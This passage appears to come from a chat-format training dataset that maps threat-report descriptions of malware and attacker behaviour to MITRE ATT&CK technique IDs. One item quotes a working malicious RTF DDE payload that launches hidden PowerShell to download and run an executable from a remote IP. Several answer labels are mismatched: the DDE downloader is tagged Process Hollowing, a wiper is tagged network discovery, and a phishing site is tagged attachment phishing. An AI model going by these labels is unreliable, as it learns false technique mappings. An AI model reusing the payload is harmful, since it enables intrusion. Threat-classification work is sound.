- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic gathers a list of all user accounts, privilege classes, and time of last logon."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM has encoded its C2 traffic with Base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can extract cached password hashes from a system’s registry."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GRIFFON has used a reconnaissance module that can be used to retrieve information about a victim's computer, including the resolution of the workstation ."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been known to create or enable accounts, such as support_388945a0."
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can identity the current process on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SynAck payloads are obfuscated prior to compilation to inhibit analysis and/or reverse engineering."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to download an .exe and use process hollowing to inject it into a new process."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uploads and downloads information."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used \"net accounts\" and \"net accounts /domain\" to acquire password policy information."
- },
- {
- "role": "assistant",
- "content": "T1201 - Password Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The fourth-stage wiper starts off by enumerating from A to Z, looking for fixed and remote logical drives in the system. Enumerates logical drives. For each enumeration, it performs a breadth-first search to wipe the files in the logical drive while ignoring files located in the \"%HOMEDRIVE%\\Windows\" directory"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery', 'T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Oldrea collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can drop its payload into the Startup directory to ensure it automatically runs when the compromised system is started."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the Windows API call, CreateProcessW(), to manage execution flow."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TURNEDUP is capable of downloading additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has the ability to side-load malicious DLLs with legitimate applications from Kaspersky, Microsoft, and Google."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SYNful Knock can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages."
- },
- {
- "role": "assistant",
- "content": "T1205 - Traffic Signaling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NativeZone can decrypt and decode embedded Cobalt Strike beacon stage shellcode."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Diavol has used HTTP GET and POST requests for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLEAD also uses CVE-2017-7269, a buffer overflow vulnerability Microsoft Internet Information Services (IIS) 6.0 to compromise the victim’s server. This is another way for them to establish a new C&C or HTTP server"
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The email attachment is encrypted and stored in the compressed package, and a decryption password is provided in the mail body to bypass the security detection of the email gateway"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aquatic Panda has attempted to discover third party endpoint detection and response (EDR) tools on compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The wave against the government entity (June 26) also involved a simple PE file attachment (SHA256: d948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520) using the filename tafahom.exe"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dyre registers itself as a service by adding several Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak also performs techniques for disabling security tools, deleting files that are left in malicious activity, and modifying registry to hide configuration information."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1070.004 - Indicator Removal on Host: File Deletion', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sakula contains UAC bypass code for both 32- and 64-bit systems."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can retrieve OS name/architecture and computer/domain name information from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volexity's investigation into this incident determined the attacker had accessed the Duo integration secret key (akey) from the OWA server. This key then allowed the attacker to derive a pre-computed value to be set in the duo-sid cookie. After successful password authentication, the server evaluated the duo-sid cookie and determined it to be valid. This allowed the attacker with knowledge of a user account and password to then completely bypass the MFA set on the account. It should be noted this is not a vulnerability with the MFA provider and underscores the need to ensure that all secrets associated with key integrations, such as those with an MFA provider, should be changed following a breach. Further, it is important that not only are passwords changed after a breach, but that passwords are not set to something similar to the previous password (e.g"
- },
- {
- "role": "assistant",
- "content": "T1550.004 - Web Session Cookie', 'T1606.001 - Web Cookies"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Rundll32 to load a malicious DLL."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proton gathers credentials in files for keychains."
- },
- {
- "role": "assistant",
- "content": "T1555.001 - Credentials from Password Stores: Keychain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These credentials are then used to compromise Linux ESXi servers and authenticate to their vCenter web interfaces."
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group has the capability to set up phishing infrastructure to mimic well known websites and trick victims to enter their credentials. This is one of the main methods used by this actor to collect email addresses that later will be used to send spearphishing emails. The group is still using similar phishing models previously mentioned in the KISA report with some small changes"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1589.002 - Email Addresses"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ChChes can encrypt C2 traffic with AES or RC4."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used the \"net\" command to retrieve information about domain accounts."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit contains a collection of Exfiltration modules that can harvest credentials using Mimikatz."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains the victim username."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon can impersonate tokens using \"LogonUser\", \"ImpersonateLoggedOnUser\", and \"ImpersonateNamedPipeClient\"."
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has used AES and XOR to decrypt its DLLs."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore has leveraged /bin/sh and /bin/bash to execute commands on the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 6 Example of delivery document The RTF document (8cf3bc2bf…) was very small in size at 264 bytes, which can be seen in its entirety here: {\\rtf1{\\field{\\*\\fldinst DDEAUTO \"C:\\\\\\\\WIndowS\\\\\\\\SYsTem32\\\\\\\\cMD.eXe \" \"/C\tPOWErsHELl.eXE -ex BypaSs -NOP\t-w HIdDen (NEw-oBjeCT SyStEm.NET.weBCLiENT).dowNloADFILe( 'hxxp://86.106.131[.]177/link/GRAPH.EXE' , '%apPDAtA%\\graph.exe' ) ; saps '%Appdata%\\graph.exe'\"}}} The contents above use the DDE functionality in Microsoft Word to run a PowerShell script to download the Koadic payload from a remote server, save it as an executable file on the system and then execute the payload"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium has the ability to use various Windows API functions to perform tasks."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This Unix binary is widely used by many malware families to determine the device’s unique ID (for campaign tracking), usually in the form of the machine’s serial number. This may or may not be hashed with another utility (e.g. md5) before being sent to the C2. To facilitate anti-analysis and evasion, ioreg is also used by some threat actors to determine whether the device is running in a virtual environment"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used various tools to perform credential dumping."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Orz can gather a process list from the victim."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WINDSHIELD can gather Registry values."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI is a RAT that is believed to have been in use for over four years, with a wide array of functionalities, often leveraging free web hosting providers like 000webhost for its C2 infrastructure"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Posted on . May 23, 2017 . (May 2, 2022) . by Raphael Mudge . Cobalt Strike 3.8 is now available. This release also gives the operator control over the script templates Cobalt Strike uses in its attacks and workflows. This release of Cobalt Strike pushes back on this technique with the ppid command. These commands offer means to spawn a payload, in another desktop session, without remote process injection. As detection of remote process injection becomes more common, it’s important to have other ways to achieve our goals without this offensive technique. The Resource Kit . Cobalt Strike 3.8’s Resource Kit finally gives you a way to change Cobalt Strike’s built-in script templates. The Resource Kit is a collection of Cobalt Strike’s default script templates and a sample Aggressor Script to bring these into Cobalt Strike. Go to Help -> Arsenal from a licensed copy of Cobalt Strike to download the Resource Kit. The Resource Kit benefits from new Aggressor Script hooks to provide the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows. A 21-day Cobalt Strike trial is also available"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can drop itself in \"C:\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll\" to be loaded automatically by the spoolsv Windows service."
- },
- {
- "role": "assistant",
- "content": "T1547.012 - Boot or Logon Autostart Execution: Print Processors"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has staged archived files in a temporary directory prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WindTail has the ability to use the macOS built-in zip utility to archive files."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has executed commands through the installed web shell via Tor exit nodes."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used the Windows command shell to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This indicates that the attackers stole and modified a legitimate document from the compromised user account, crafted a malicious decoy Word macro document using this stolen document and sent it to the target recipient who might be expecting the email from the original account user before the real sender had time to send it"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment', 'T1087 - Account Discovery', 'T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk has used a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shark has the ability to upload files from the compromised host over a DNS or HTTP C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the OS version, logical drives information, processor information, and volume information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HELLOKITTY is written in C++, but reimplements a significant portion of DEATHRANSOM's functionality using similar loop operations and thread pooling via QueueUserWorkItem. The code structure to enumerate network resources, logical drives, and perform file encryption is very similar. Additionally, HELLOKITTY and DEATHRANSOM share very similar functions to check for the completion status of their encryption threads before exiting"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API (DRSUAPI), or Volume Shadow Copy."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EXOTIC LILY has created e-mail accounts to spoof targeted organizations."
- },
- {
- "role": "assistant",
- "content": "T1585.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sliver has the ability to support C2 communications over HTTP/S."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nomadic Octopus has used PowerShell for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can modify the shortcut that launches Telegram by replacing its path with the malicious payload to launch with the legitimate executable."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to exfiltrate data, the plugin uses the function “post” in the HTTPClient class. Post” gives the plugin the ability to upload content and exfiltrate data to the remote C2 whose domain is stored in the registry"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy2 was eventually seen downloading more crimeware plugins – a custom spam plugin and a banking information stealer custom plugin"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a dropper called MaoCheng that harvests a stolen digital signature from Adobe Systems."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another infamous banker Trojan, Kronos, caught up with Edge in 2016. We checked out its capabilities on a Windows 10 virtual machine. In the code of the new Kronos version we found a function that checks the name and checksum of a process, as well as the hashes of the functions hooked by the malware."
- },
- {
- "role": "assistant",
- "content": "T1056.004 - Input Capture: Credential API Hooking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Second technique: FIN6 also leveraged the creation of Windows services (named with a random 16-character string such as IXiCDtPbtGWnrAGQ) to execute encoded PowerShell commands. The randomly named service is a by-product of using Metasploit, which creates the 16-character service by default. The encoded command contained a Metasploit reverse HTTP shellcode payload stored in a byte-array like the first technique. This C2 URL contained shellcode that would make an HTTPS request for an additional download"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The net user username \\password and net user username \\password \\domain commands in can be used to create a local or domain account respectively."
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti can spread via SMB and encrypts files on different hosts, potentially compromising an entire network."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
